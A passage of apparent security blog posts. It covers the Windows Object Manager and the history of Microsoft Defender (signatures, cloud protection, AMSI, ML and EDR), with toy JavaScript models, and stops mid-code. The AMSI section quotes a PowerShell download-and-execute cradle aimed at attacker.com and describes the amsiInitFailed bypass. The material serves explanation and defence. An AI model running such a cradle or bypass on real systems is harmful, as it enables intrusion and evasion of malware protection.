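function resolveDosDevice(drive, sessionDosDevices, globalDosDevices) {
  return sessionDosDevices.has(drive)
    ? sessionDosDevices.get(drive)
    : globalDosDevices.get(drive);
}

const edgeRenderer = { sessionId: 1, packageSid: 'S-1-15-2-1111' }; // made-up package SID
const desktopApp = { sessionId: 1, packageSid: null };
console.log(rewriteForToken('Global\\Foo', edgeRenderer));
console.log(rewriteForToken('Global\\Foo', desktopApp));

const globalDosDevices = new Map([['C:', '\\Device\\HarddiskVolume3']]);
const cleanSession = new Map();
const plantedSession = new Map([['C:', '\\Device\\AttackerControlledPath']]); // hypothetical remap
console.log(resolveDosDevice('C:', cleanSession, globalDosDevices));
console.log(resolveDosDevice('C:', plantedSession, globalDosDevices));
```

The last line shows why the per-session `\??` is an exploit boundary. A per-session definition of `C:` shadows the machine-wide link for every lookup made from that session.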

The four pieces of the 1993 Cutler design have shipped without architectural change for thirty-three years. The six generations of partition primitives stacked on top are all simultaneously load-bearing on Windows 11 25H2. The namespace itself is a coordination mechanism, in Anderson 1972's sense of the reference-validation mechanism, with Saltzer-Schroeder 1975's complete-mediation principle as the design constraint it must satisfy. Containment lives in the partition layers above it: the session, the package, the integrity level, the silo, and the VTL split. Every other article in this corpus -- the Credential Guard piece, the AppContainer piece, the VBS Trustlets piece, the Hyper-V piece, the App Identity piece, the TPM piece -- quietly assumes this tree underneath them.

Key idea: Every Windows security boundary is a path rewrite, a per-directory ACL, a token-keyed name substitution, or a kernel callback against an OBJECT_TYPE. The Object Manager is the data structure underneath them all.
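To make "the data structure underneath them all" concrete, here is a rough JavaScript model of one `OBJECT_DIRECTORY`. It uses 37 chained hash buckets with case-insensitive name lookup, matching the bucket count mentioned above. The hash function is a hypothetical stand-in; the real one in the kernel differs, and real entries point at object bodies rather than plain JavaScript objects.

```javascript
// Rough model of an OBJECT_DIRECTORY; the hash is a stand-in, not the kernel's.
const NUMBER_HASH_BUCKETS = 37;

class ObjectDirectory {
  constructor() {
    // Each bucket is a chain of { name, object } entries.
    this.buckets = Array.from({ length: NUMBER_HASH_BUCKETS }, () => []);
  }
  // Hash the upper-cased name so lookups are case-insensitive.
  static bucketFor(name) {
    let h = 0;
    for (const ch of name.toUpperCase()) {
      h = (h * 31 + ch.codePointAt(0)) >>> 0;
    }
    return h % NUMBER_HASH_BUCKETS;
  }
  find(name) {
    const chain = this.buckets[ObjectDirectory.bucketFor(name)];
    return chain.find((e) => e.name.toUpperCase() === name.toUpperCase()) || null;
  }
  insert(name, object) {
    if (this.find(name)) return 'STATUS_OBJECT_NAME_COLLISION';
    this.buckets[ObjectDirectory.bucketFor(name)].push({ name, object });
    return 'STATUS_SUCCESS';
  }
  lookup(name) {
    const entry = this.find(name);
    return entry ? entry.object : null;
  }
}

const bno = new ObjectDirectory();
console.log(bno.insert('MyMutex', { type: 'Mutant' }));
console.log(bno.insert('MYMUTEX', { type: 'Mutant' }));
console.log(bno.lookup('mymutex'));
```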

**Key terms.** Object Manager (`Ob`), `OBJECT_HEADER`, `OBJECT_TYPE`, `ParseProcedure`, `OBJECT_DIRECTORY`, Lowbox token, AppContainer, Server Silo, Trustlet / IUM, Boundary descriptor, Session 0 isolation, Mandatory Integrity Control, `ObRegisterCallbacks`, KMCS, HVCI, `\BaseNamedObjects`, `\Sessions\\AppContainerNamedObjects`, `\RPC Control`, `\KnownDlls`, `\BNOLINKS`, `\GLOBAL??`, `\??`.

Review questions.

Why does AppContainer isolation work even when the calling UWP app explicitly asks for Global\X?
What is the relationship between IopParseDevice, \Device\HarddiskVolume1, and IRP_MJ_CREATE?
Which of Anderson 1972's four NEAT properties does the Object Manager achieve cleanly, and which does it provably fail?
Why is ObRegisterCallbacks an enforcement gate only against handle creation and duplication, not against handle use?
Why does the canonical MS15-090 OM-symlink CVE point at CVE-2015-2428 [@nvd-cve-2015-2428] rather than CVE-2015-2528 or CVE-2015-1463?
What is the structural difference between \??\C: and \GLOBAL??\C:, and which one does the HackSys / CVE-2023-35359 worked example abuse?

Recommended reading. Russinovich, Ionescu, and Solomon, Windows Internals, Part 1 (7th edition, Microsoft Press, 2017), Chapter 8 [@microsoftpressstore-wininternals7-part1]. James Forshaw, Windows Security Internals (No Starch Press, 2024), Chapter 8 [@nostarch-windows-security-internals]. Alex Ionescu, Battle of SKM and IUM, Black Hat USA 2015 [@ionescu-bh2015-pdf]. The Google Project Zero blog's symlink mitigations [@p0-symlink-mitigations], arbitrary directory creation [@p0-issue1550], and who contains the containers [@p0-who-contains-containers] posts. James P. Anderson, Computer Security Technology Planning Study [@csrc-nist-ande72].

The Defender's Dilemma: How Microsoft Won the Antivirus War It Can Never Finish

noreply@paragmali.com (Parag Mali) — Wed, 29 Apr 2026 00:00:00 GMT

**Windows Defender went from scoring 0.5/6 in AV-TEST protection testing (2012) to top-tier MITRE ATT&CK Enterprise results with zero false positives (2024).** The transformation happened through four generational leaps: cloud-delivered ML protection, AMSI for fileless malware visibility, EDR for post-breach detection, and unified XDR across endpoints, email, identity, and cloud. Despite this, Fred Cohen's 1986 dissertation establishes that perfect malware detection is mathematically impossible -- every endpoint protection system, including Defender, operates within this theoretical ceiling.

From Zero to Hero

In October 2012, AV-TEST -- the world's most respected independent antivirus testing lab -- published results that should have embarrassed Microsoft into silence. Windows Defender, the antivirus built into Windows 8, scored 0.5 out of 6.0 for malware protection [@av-test]. Dead last among 25 products tested. Worse than free tools from startups nobody had heard of.

Twelve years later, the lineage that began with Windows Defender sat inside Microsoft Defender XDR, a cross-domain security suite that achieved top-tier 2024 MITRE ATT&CK Enterprise results with zero false positives [@mitre-2024]. For the sixth consecutive year, Gartner named Microsoft a Leader in Endpoint Protection Platforms [@gartner-epp-2025].

This is the story of how that happened -- and why, despite the transformation, the war can never be won.

Key idea: A product that scored dead last in independent testing in 2012 became an industry leader by 2024. The reversal was not incremental improvement -- it was a complete architectural revolution spanning cloud ML, behavioral analysis, and cross-domain correlation.

To understand how Defender reached this point, we need to go back to the moment when Microsoft was forced to care about security -- not because they wanted to, but because worms were literally attacking their own update servers.

Historical Origins: The Trustworthy Computing Pivot

On August 11, 2003, the Blaster worm infected hundreds of thousands of Windows PCs [@ms03-026]. It carried a message embedded in its code: "billy gates why do you make this possible ? Stop making money and fix your software!!"

The taunt became one of the most quoted lines in malware history. It captured the frustration millions of users felt with Windows security in the early 2000s.

The answer had actually begun 18 months earlier. On January 15, 2002, Bill Gates sent an internal memo to every Microsoft employee that would reshape the company's entire engineering culture.

Trustworthy Computing is the highest priority for all the work we are doing. -- Bill Gates, January 15, 2002 [@gates-memo]

Gates' memo came in response to a cascade of security catastrophes. In July 2001, the Code Red worm tore through hundreds of thousands of IIS web servers, defacing websites and launching DDoS attacks against whitehouse.gov [@cert-code-red]. Weeks later, the Nimda worm used five distinct propagation methods -- email, network shares, web servers, browser exploits, and back doors left by Code Red II -- causing massive infrastructure disruption [@cert-nimda]. Coming days after September 11, Nimda heightened the sense of digital infrastructure vulnerability across the United States.

Trustworthy Computing: Microsoft's company-wide security pivot, initiated by Bill Gates' January 2002 memo. It paused Windows development for security audits, created the Security Development Lifecycle (SDL), and led to the creation of the Security Technology Unit that would eventually build Windows Defender.

Then came Blaster (2003), which exploited a known RPC buffer overflow to crash millions of Windows systems and attempted a DDoS attack against windowsupdate.com -- Microsoft's own patching infrastructure [@ms03-026]. Sasser followed in April 2004, a self-propagating worm written by an 18-year-old German student that required no user interaction and took down hospitals, airlines, and banks worldwide [@ms04-011].

The first tangible fruit of Gates' memo was Windows XP Service Pack 2 (August 2004), which enabled Windows Firewall by default, introduced the Security Center, and added Data Execution Prevention [@wp-xp-sp2]. But the worms were only half the problem. By 2004, studies estimated 67% of home PCs were infected with spyware -- browser hijackers, bundled toolbars, and adware installed without informed consent.

Microsoft needed an antispyware tool, and they needed it fast. In December 2004, they acquired GIANT Company Software and its GIANT AntiSpyware product [@giant-acquisition]. Within a month, Microsoft released it as Microsoft AntiSpyware Beta [@wp-defender]. By 2006, it was rebranded as Windows Defender; it shipped with Vista in January 2007 [@wp-defender].

Microsoft now had an antispyware tool -- but spyware was only half the problem. Viruses, trojans, and worms were still devastating Windows systems, and Defender 1.0 couldn't detect any of them.

Early Approaches: Signatures and Their Limits

Windows Defender 1.0 shipped with Vista in January 2007, and it could scan your PC for spyware. Just spyware. Not viruses. Not trojans. Not ransomware. It was like selling a house with a lock on the front door and no walls.

Signature-based detection: A malware identification technique that compares files against a database of known malware "signatures" -- cryptographic hashes and byte-pattern rules. Fast and precise for known threats, but fundamentally reactive: a new malware sample must be captured, analyzed, and signed before protection applies.

The detection engine worked through simple pattern matching. On access or during scheduled scans, files were hashed and compared against a curated signature database delivered through Windows Update. Hash-based lookups ran in $O(n)$ time overall, where $n$ = files scanned: one constant-time set lookup per file on average, ignoring the cost of hashing each file's bytes. Naively testing every pattern rule against every file ran in $O(n \times m)$, where $m$ = pattern count. Space was proportional to the database -- tens of megabytes.
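A toy version of the two lookup styles makes the cost difference concrete. This JavaScript sketch is illustrative only. FNV-1a stands in for the cryptographic hashes real engines use, and the byte patterns and the rule name `Toy.A` are made up. The nested loop is the naive $O(n \times m)$ strategy described above; it does not show how a production engine is necessarily built.

```javascript
// Toy signature scanner; FNV-1a stands in for a cryptographic hash.
function fnv1a32(bytes) {
  let h = 0x811c9dc5;
  for (const b of bytes) {
    h ^= b;
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Naive substring search of one byte pattern inside a file.
function containsPattern(bytes, pattern) {
  outer: for (let i = 0; i + pattern.length <= bytes.length; i++) {
    for (let j = 0; j < pattern.length; j++) {
      if (bytes[i + j] !== pattern[j]) continue outer;
    }
    return true;
  }
  return false;
}

// Hash lookup: one Set probe per file. Pattern rules: every rule against every file.
function scan(files, knownBadHashes, patternRules) {
  return files.map((file) => {
    if (knownBadHashes.has(fnv1a32(file.bytes))) return { name: file.name, verdict: 'hash match' };
    const rule = patternRules.find((r) => containsPattern(file.bytes, r.pattern));
    return { name: file.name, verdict: rule ? `rule ${rule.id}` : 'clean' };
  });
}

const sample = Uint8Array.from([0x4d, 0x5a, 0x90, 0x00, 0xde, 0xad, 0xbe, 0xef]);
const knownBadHashes = new Set([fnv1a32(sample)]);
const patternRules = [{ id: 'Toy.A', pattern: [0xde, 0xad, 0xbe, 0xef] }];
const files = [
  { name: 'dropper.exe', bytes: sample },
  { name: 'variant.exe', bytes: Uint8Array.from([0x4d, 0x5a, 0x00, 0x00, 0xde, 0xad, 0xbe, 0xef]) },
  { name: 'notes.txt', bytes: Uint8Array.from([0x68, 0x69]) },
];
console.log(scan(files, knownBadHashes, patternRules));
```

A single changed byte in `variant.exe` is enough to miss the hash signature, but the byte-pattern rule still catches it. That is the trade-off between the precise-but-brittle hash and the broader-but-costlier pattern rule.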

The approach had a fatal structural weakness: it was purely reactive. A new spyware sample had to be captured, analyzed, signed, and distributed before any endpoint received protection. Average time-to-signature was hours to days. And polymorphic malware -- code that changes its binary representation on every infection -- rendered signatures nearly useless.

Windows Live OneCare (2006--2009) was Microsoft's first attempt at a paid consumer security suite [@wp-defender]. It bundled antivirus, firewall, backup, and PC tune-up into a subscription product. It flopped: poor detection rates, low market share against Norton and McAfee, and Microsoft's eventual realization that free, universal security was the only path forward. OneCare was discontinued June 30, 2009.

A polymorphic variant of the Vundo trojan (2007--2008) illustrated the problem perfectly [@wp-defender]. Vundo repacked itself on every infection, generating a unique binary hash each time. Defender's signature database couldn't keep pace with the variant generation rate. Users were infected despite having "protection" enabled.
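The Vundo problem reduces to a few lines. In this hypothetical JavaScript sketch, a toy "packer" XORs the same payload with a fresh one-byte key on each infection and prepends the key. As a result, every copy has different bytes, and the plaintext byte pattern no longer appears in the file. Real packers are far more elaborate; the single-byte XOR is an assumption chosen to keep the example short.

```javascript
// Toy polymorphic packer: same payload, different bytes on every "infection".
function fnv1a32(bytes) {
  let h = 0x811c9dc5;
  for (const b of bytes) {
    h ^= b;
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

function pack(payload, key) {
  const out = new Uint8Array(payload.length + 1);
  out[0] = key; // the unpacking stub needs the key at run time
  for (let i = 0; i < payload.length; i++) out[i + 1] = payload[i] ^ key;
  return out;
}

function unpack(packed) {
  const key = packed[0];
  return packed.slice(1).map((b) => b ^ key);
}

// Space-separated hex keeps substring matches aligned to byte boundaries.
const hex = (u8) => Array.from(u8, (b) => b.toString(16).padStart(2, '0')).join(' ');

const payload = Uint8Array.from([0xde, 0xad, 0xbe, 0xef, 0x01, 0x02]);
const copies = [0x11, 0x22, 0x33].map((key) => pack(payload, key));
const hashes = new Set(copies.map((c) => fnv1a32(c)));

console.log('distinct hashes:', hashes.size);
console.log('plaintext pattern visible in any copy:', copies.some((c) => hex(c).includes('de ad be ef')));
console.log('all unpack to the same payload:',
  copies.every((c) => unpack(c).every((b, i) => b === payload[i])));
```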

Microsoft knew signatures alone were a losing game. In September 2009, they released Microsoft Security Essentials (MSE) -- a free standalone antivirus for Windows XP, Vista, and 7 that added virus detection alongside the spyware scanning [@wp-defender]. MSE replaced the failed OneCare product and proved Microsoft could build a competent, if basic, AV engine.

Then came the merger that seemed like a triumph. Windows 8 (October 2012) absorbed MSE's antivirus capabilities directly into Defender, creating the first Windows version with built-in, always-on antivirus protection. Every Windows PC would finally have real antivirus from the moment of installation.

Problem solved? Not even close. The independent labs were about to deliver a devastating verdict.

The Humiliation: Worst-in-Class Scores

When Windows 8 shipped in October 2012 with Defender built in, it seemed like a structural win -- every Windows PC would finally have antivirus protection by default. Then the test results came in.

AV-TEST's October 2012 evaluation scored Windows Defender 0.5 out of 6.0 for the aggregate Protection category -- the worst score among all 25 products tested [@av-test]. In that testing period, it missed a significant proportion of real-world malware samples that competitors caught routinely. Across 2012--2014, Defender protection scores hovered between 0.5 and 2.0 out of 6.0 -- near the bottom of every independent test.

gantt
title Defender AV-TEST Protection Score Progression
dateFormat YYYY
axisFormat %Y
section Protection Score
0.5-2.0/6 (Worst tier) :crit, 2012, 2015
3.0-4.5/6 (Improving) :active, 2015, 2017
5.0-5.5/6 (Competitive) :active, 2017, 2019
6.0/6 (Top tier, consistent) :done, 2019, 2026

The industry's verdict was damning. Security analysts described Defender as "baseline protection" -- polite language for "better than nothing, barely." CryptoLocker ransomware arrived in September 2013, encrypting users' files and demanding ransom payment [@wp-cryptolocker]. Signature-based Defender couldn't detect it until days after initial distribution, by which time hundreds of thousands of PCs were already compromised.

CrowdStrike, founded in 2011 by George Kurtz, Dmitri Alperovitch, and Gregg Marston [@wp-crowdstrike], was building a fundamentally different approach during this period -- a cloud-native, agent-based EDR platform that would become Defender's most formidable competitor.

Meanwhile, the competitive field was shifting. Norton, McAfee, and Kaspersky still dominated the traditional AV market. But new cloud-native challengers were emerging. CrowdStrike launched its Falcon platform commercially around 2013--2014, betting on cloud-delivered threat intelligence and behavioral detection [@wp-crowdstrike]. SentinelOne, founded in 2013 [@wp-sentinelone], wagered on autonomous on-device AI.

But here's the structural insight that Microsoft's leadership grasped: integration was right. Universal-default protection was right. The detection engine was wrong. The question became whether Microsoft could revolutionize the detection engine without undoing the universal-default advantage.

The answer would come from the cloud.

The Breakthrough: Cloud, AMSI, and Machine Learning

Between 2015 and 2018, Microsoft executed the fastest architectural transformation in antivirus history. In four years, Defender went from a signature-based scanner to a cloud-powered, ML-driven, behavior-aware platform. The key insight: stop scanning files. Start understanding behavior.

Cloud-Delivered Protection and Block at First Sight

Cloud-delivered protection: A detection architecture where unknown files on an endpoint are analyzed in real time by cloud-based machine learning models. The endpoint sends file metadata and samples to the cloud, which returns a verdict (malicious, clean, or unknown) typically within milliseconds.

Windows 10 (July 2015) connected Defender to Microsoft's Azure cloud for real-time verdicts [@cloud-protection]. When an endpoint encounters an unknown file, Defender sends its metadata to the cloud service. Cloud ML models -- including gradient-boosted tree ensembles and deep neural networks -- analyze the sample and return a classification [@ml-pipeline].

Block at First Sight (BAFS): A Defender feature that holds unknown files from execution until the cloud returns a verdict. If the cloud classifies the file as malicious, it is blocked and quarantined before the user is ever exposed. This reduces zero-day exposure from hours (waiting for signature updates) to milliseconds or seconds.

The real breakthrough came with Block at First Sight (BAFS), introduced with the Windows 10 Anniversary Update in 2016 and expanded through later cloud-protection improvements [@wp-defender, @bafs-blog]. When Defender encounters a file it has never seen before, BAFS holds it -- preventing execution -- while the cloud runs its ML pipeline. The verdict comes back in milliseconds to seconds. If malicious, the file is quarantined. If clean, execution proceeds. The user never notices the delay.

Approximately 96% of all malware files detected and blocked by Windows Defender Antivirus (Windows Defender AV) are observed only once on a single computer. -- Microsoft Security Blog, 2017 [@bafs-blog]

That statistic -- 96% of malware is unique to a single endpoint -- explains why signatures were doomed. You can't write a signature for something you've never seen. But you can train a model on billions of samples and classify new variants in real time.

sequenceDiagram
participant User as User
participant Endpoint as Defender Endpoint
participant Cloud as Microsoft Cloud
participant ML as ML Models
User->>Endpoint: Opens unknown file
Endpoint->>Endpoint: Local signature check (miss)
Endpoint->>Endpoint: On-device ML (uncertain)
Endpoint->>Cloud: Send file metadata + sample
Note over Endpoint: File held from execution
Cloud->>ML: Gradient-boosted trees + DNN
ML->>Cloud: Verdict: MALICIOUS
Cloud->>Endpoint: Block verdict
Endpoint->>User: File quarantined
Note over Cloud: Verdict shared to all endpoints

The feedback loop was the key multiplier. With over a billion Windows endpoints feeding telemetry into the cloud, every new threat detected on one machine instantly protected every other machine in the network. The entire Windows install base became a collective immune system.
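The hold-then-decide flow and the shared-verdict feedback loop can be sketched together. In this hypothetical JavaScript model, `CloudService.classify` stands in for the cloud ML pipeline. Verdicts are cached by file hash, so a second endpoint gets an answer without re-running the model. The score thresholds, file hash, and behavior hints are arbitrary assumptions, and none of these names are Defender APIs.

```javascript
// Hypothetical model of Block at First Sight with a shared cloud verdict cache.
class CloudService {
  constructor(classify) {
    this.classify = classify;  // stand-in for the cloud ML pipeline
    this.verdicts = new Map(); // file hash -> verdict, shared by every endpoint
    this.modelRuns = 0;
  }
  verdictFor(file) {
    if (!this.verdicts.has(file.hash)) {
      this.modelRuns++;
      this.verdicts.set(file.hash, this.classify(file));
    }
    return this.verdicts.get(file.hash);
  }
}

// Local score is 0-100; only the uncertain middle band goes to the cloud.
function openFile(file, localModelScore, cloud) {
  const score = localModelScore(file);
  if (score >= 90) return 'quarantined (on-device)';
  if (score <= 10) return 'executed';
  // Uncertain: the file is held from execution until the cloud answers.
  return cloud.verdictFor(file) === 'malicious' ? 'quarantined (cloud)' : 'executed';
}

const cloud = new CloudService((f) => (f.behaviorHints.includes('injects') ? 'malicious' : 'clean'));
const uncertain = () => 50; // the on-device model cannot decide
const newThreat = { hash: 'a1b2', behaviorHints: ['injects'] };

console.log('endpoint 1:', openFile(newThreat, uncertain, cloud));
console.log('endpoint 2:', openFile(newThreat, uncertain, cloud));
console.log('cloud model runs:', cloud.modelRuns);
```

The second endpoint is protected by the first endpoint's lookup: the model runs once, and the cached verdict serves everyone after that.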

AMSI: Seeing Through Obfuscation

Antimalware Scan Interface (AMSI): A Windows API introduced in Windows 10 (2015) that allows script engines -- PowerShell, VBA, JavaScript, VBScript -- to submit content to the registered antimalware provider for scanning after deobfuscation but before execution. AMSI closes the fileless malware blind spot by inspecting code at the semantic layer rather than the file layer.

Cloud-delivered protection solved the "never-before-seen file" problem. But what about attacks that don't use files at all?

By 2015, attackers had discovered that PowerShell could execute entire attack frameworks in memory. The PowerShell Empire framework, widely adopted from 2015 onward, could download and execute a malicious payload with a single command -- `IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')` -- without ever writing a file to disk. Defender's file-scanning engine never had an opportunity to inspect the payload.

AMSI addressed this by creating an interface at the script execution layer [@amsi-docs]:

A script engine (PowerShell 5.0+, VBA, JavaScript) processes a script block
Before execution, the engine calls AmsiScanBuffer(), passing the deobfuscated content to AMSI
AMSI routes the content to the registered antimalware provider (Defender)
Defender scans the content against signatures, heuristics, and ML models
If malicious, execution is blocked and an event is logged

sequenceDiagram
participant Script as PowerShell Script
participant Engine as PowerShell Engine
participant AMSI as AMSI Interface
participant Defender as Windows Defender
Script->>Engine: Encoded/obfuscated payload
Engine->>Engine: Deobfuscate script block
Engine->>AMSI: AmsiScanBuffer(deobfuscated content)
AMSI->>Defender: Route to registered provider
Defender->>Defender: Signature + ML scan
alt Malicious
  Defender->>AMSI: AMSI_RESULT_DETECTED
  AMSI->>Engine: Block execution
  Engine->>Script: Execution prevented
else Clean
  Defender->>AMSI: AMSI_RESULT_CLEAN
  AMSI->>Engine: Allow execution
  Engine->>Script: Script executes
end

The word "deobfuscated" is the key. Attackers routinely obfuscated their PowerShell scripts with multiple layers of encoding -- Base64, XOR, string concatenation, variable substitution. By the time AMSI sees the content, the script engine has already resolved all that obfuscation down to the actual commands. AMSI scans what the code does, not what it looks like [@powershell-blue-team].
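The ordering that matters, deobfuscate first and scan second, is easy to see in a toy model. This JavaScript sketch is hypothetical. `deobfuscate` only unwraps a Base64 `-EncodedCommand` argument (UTF-16LE, as PowerShell uses), standing in for the engine resolving its own encodings. `provider` is a single-string check in place of Defender's signatures and ML. The result constants mirror the documented `AMSI_RESULT` values, where anything at or above `AMSI_RESULT_DETECTED` (32768) counts as malware.

```javascript
// Toy model of the AMSI ordering; only the result constants mirror amsi.h.
const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_NOT_DETECTED = 1;
const AMSI_RESULT_DETECTED = 32768;
const amsiResultIsMalware = (r) => r >= AMSI_RESULT_DETECTED;

// Stand-in for the engine resolving one encoding layer before scanning.
function deobfuscate(scriptBlock) {
  const m = scriptBlock.match(/^-EncodedCommand\s+(\S+)$/);
  return m ? Buffer.from(m[1], 'base64').toString('utf16le') : scriptBlock;
}

// Stand-in provider: one "signature" in place of signatures + ML.
function provider(content) {
  return content.includes('DownloadString') ? AMSI_RESULT_DETECTED : AMSI_RESULT_NOT_DETECTED;
}

function runScriptBlock(scriptBlock) {
  const content = deobfuscate(scriptBlock); // 1. the engine deobfuscates
  const result = provider(content);         // 2. AmsiScanBuffer-style scan
  return amsiResultIsMalware(result) ? 'blocked' : 'executed';
}

const cradle = "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')";
const encoded = '-EncodedCommand ' + Buffer.from(cradle, 'utf16le').toString('base64');

console.log('scan of raw encoded text:', provider(encoded));
console.log('after deobfuscation:', runScriptBlock(encoded));
```

Scanning the encoded text finds nothing, because the signature string is not present in the Base64. Scanning the engine's deobfuscated view finds it.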

AMSI had a fundamental architectural vulnerability: it runs in user mode, inside the process it's monitoring. That means user-mode code can tamper with AMSI's in-process state. By 2016, a widely cited PowerShell reflection technique could set `amsiInitFailed` to `true`, causing all subsequent AMSI scans to return "not detected" [@graeber-amsi-bypass]. While Microsoft signatured this specific bypass, the underlying issue -- that AMSI is accessible to the code it inspects -- has spawned an ongoing arms race of bypass variants and countermeasures.

A widely cited AMSI bypass technique was elegant in its simplicity: one line of PowerShell reflection that flipped an internal flag. It demonstrated a deeper truth about user-mode security boundaries -- they are speed bumps, not walls.
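Why an in-process flag is only a speed bump can be shown without any real bypass code. In this hypothetical JavaScript model, a scanner object shares state with the code it inspects (here, the same object graph), and its scan fails open when an `initFailed` field is set. The field name echoes `amsiInitFailed`, but nothing here touches the real AMSI.

```javascript
// Toy model: the inspector shares mutable state with the code it inspects.
const AMSI_RESULT_NOT_DETECTED = 1;
const AMSI_RESULT_DETECTED = 32768;

const scanner = {
  initFailed: false,
  scan(content) {
    if (this.initFailed) return AMSI_RESULT_NOT_DETECTED; // fail open: nothing was scanned
    return content.includes('evil') ? AMSI_RESULT_DETECTED : AMSI_RESULT_NOT_DETECTED;
  },
};

// Code running in the same process can reach the scanner's state directly.
function hostileScript(sharedScanner) {
  sharedScanner.initFailed = true;
  return sharedScanner.scan('evil payload');
}

console.log('before tampering:', scanner.scan('evil payload'));
console.log('after tampering:', hostileScript(scanner));
```

Any defense whose state lives in the attacker's address space inherits this weakness. A kernel-side or out-of-process check does not.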

The ML Pipeline

Behind both cloud protection and AMSI sits a multi-layered machine learning pipeline [@ml-pipeline]:

On-device gradient-boosted trees (GBT): Lightweight models that classify files based on static features -- PE header metadata, import tables, entropy scores. These run in milliseconds and handle the easy cases.
Cloud deep neural networks (DNN): For files the on-device model flags as uncertain, cloud-side DNNs perform deeper analysis on a richer feature set.
Cloud sandboxes: When ML models can't reach a confident verdict, the file is detonated in a behavioral sandbox. The sandbox observes what the file actually does -- network connections, registry modifications, process spawning -- and classifies based on behavior rather than static features.
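The escalation logic of the three tiers can be sketched as a small cascade. In this hypothetical JavaScript model, the only real technique is Shannon byte entropy, a common static feature: packed or encrypted content tends toward 8 bits per byte. The additive 0-100 score standing in for the gradient-boosted trees, the thresholds, and the `cloudDnn` and `sandbox` stand-ins are made-up assumptions, not Microsoft's models.

```javascript
// Shannon entropy in bits per byte: 0 for constant data, 8 for uniform bytes.
function byteEntropy(bytes) {
  if (bytes.length === 0) return 0;
  const counts = new Array(256).fill(0);
  for (const b of bytes) counts[b]++;
  let h = 0;
  for (const c of counts) {
    if (c === 0) continue;
    const p = c / bytes.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Hypothetical on-device score (0-100) from static features; a GBT stand-in.
function onDeviceScore(file) {
  let score = 10;
  if (byteEntropy(file.bytes) > 7.2) score += 40;               // looks packed or encrypted
  if (file.imports.includes('WriteProcessMemory')) score += 30; // injection-capable import
  return Math.min(score, 100);
}

// Escalate only the uncertain middle band to the next, costlier tier.
function classify(file, cloudDnn, sandbox) {
  const local = onDeviceScore(file);
  if (local <= 20) return { tier: 'on-device', verdict: 'clean' };
  if (local >= 80) return { tier: 'on-device', verdict: 'malicious' };
  const cloud = cloudDnn(file);
  if (cloud <= 20) return { tier: 'cloud DNN', verdict: 'clean' };
  if (cloud >= 80) return { tier: 'cloud DNN', verdict: 'malicious' };
  return { tier: 'sandbox', verdict: sandbox(file) }; // detonate and observe behavior
}

const packed = { bytes: Uint8Array.from({ length: 256 }, (_, i) => i), imports: ['WriteProcessMemory'] };
const plain = { bytes: new Uint8Array(64), imports: [] };
const borderline = { bytes: new Uint8Array(64), imports: ['WriteProcessMemory'] };
const cloudDnn = () => 50;         // hypothetical: the cloud model is unsure too
const sandbox = () => 'malicious'; // hypothetical: detonation shows injection

console.log(classify(packed, cloudDnn, sandbox));
console.log(classify(plain, cloudDnn, sandbox));
console.log(classify(borderline, cloudDnn, sandbox));
```

The cascade puts the cheap model first and reserves the sandbox for the few files that neither model can settle.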

Key idea: The shift from file scanning to behavior understanding was the conceptual revolution. Signatures asked "is this file known-bad?" Cloud ML asked "does this file look bad?" AMSI asked "is this behavior suspicious?" Each layer addressed a different class of threat, and together they covered ground that no single approach could reach alone.

The results showed in independent testing. Defender's AV-TEST protection scores climbed from 0.5--2.0 (2012--2014) to 4.0--5.0 (2016--2017) to a consistent 6.0/6.0 from 2018 onward [@av-test]. AV-Comparatives awarded Microsoft Defender "Approved Security Product" for 2024 [@av-comparatives-2024].

Defender could now detect zero-day malware in seconds and catch fileless attacks that traditional scanners missed entirely. But detection alone wasn't enough. What happens when malware gets past every layer? The SolarWinds attack was about to teach the entire industry that lesson.

Assume Breach: EDR and the XDR Vision

The SolarWinds Sunburst backdoor, discovered in December 2020, was delivered through a legitimately signed software update from a trusted vendor. It bypassed every prevention layer -- signatures, ML, behavioral monitoring, cloud analysis -- because the malicious code arrived through a channel that should be trusted. Approximately 18,000 organizations installed the compromised update. The industry learned a painful lesson: prevention is necessary but insufficient.

Endpoint Detection and Response (EDR): A post-breach security capability that continuously monitors endpoint behavior, detects suspicious activity through behavioral analytics, correlates related alerts into incidents, and provides investigation and automated response tools. EDR operates on the "assume breach" philosophy -- accepting that prevention will inevitably be bypassed.

Microsoft had anticipated this lesson. In March 2016, they announced Windows Defender Advanced Threat Protection (ATP) at RSA Conference -- an enterprise EDR service built into Windows 10. ATP represented a philosophical shift from "prevent all threats" to "assume breach, detect, and respond."

flowchart LR
A[Endpoint Sensors] --> B[Behavioral Telemetry]
B --> C[Cloud Analytics]
C --> D[Anomaly Detection]
D --> E[Incident Correlation]
E --> F{"High Confidence?"}
F -->|Yes| G[Auto Remediation]
F -->|No| H[SOC Analyst Review]
G --> I[Kill Process / Isolate / Quarantine]
H --> I

The EDR architecture collects rich behavioral telemetry from endpoints -- process creation trees, file operations, network connections, registry changes, PowerShell execution logs. This telemetry streams to Microsoft's cloud, where ML models and behavioral rules detect attack patterns like credential dumping, lateral movement, and persistence mechanisms. Related alerts are automatically grouped into incidents spanning multiple machines and timeframes.
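Grouping related alerts into incidents is, at its simplest, a connected-components problem. Two alerts belong together if they share an entity such as a device, an account, or a file hash. This JavaScript sketch uses union-find to do that grouping. It is a simplified, hypothetical model (real correlation also weighs time windows and confidence), and the alert titles and entity labels are invented for illustration.

```javascript
// Simplified alert-to-incident correlation via union-find over shared entities.
class UnionFind {
  constructor(n) {
    this.parent = Array.from({ length: n }, (_, i) => i);
  }
  find(x) {
    while (this.parent[x] !== x) {
      this.parent[x] = this.parent[this.parent[x]]; // path halving
      x = this.parent[x];
    }
    return x;
  }
  union(a, b) {
    this.parent[this.find(a)] = this.find(b);
  }
}

function groupIntoIncidents(alerts) {
  const uf = new UnionFind(alerts.length);
  const firstSeen = new Map(); // entity -> index of the first alert mentioning it
  alerts.forEach((alert, i) => {
    for (const entity of alert.entities) {
      if (firstSeen.has(entity)) uf.union(i, firstSeen.get(entity));
      else firstSeen.set(entity, i);
    }
  });
  const incidents = new Map(); // root alert index -> titles in that incident
  alerts.forEach((alert, i) => {
    const root = uf.find(i);
    if (!incidents.has(root)) incidents.set(root, []);
    incidents.get(root).push(alert.title);
  });
  return [...incidents.values()];
}

const alerts = [
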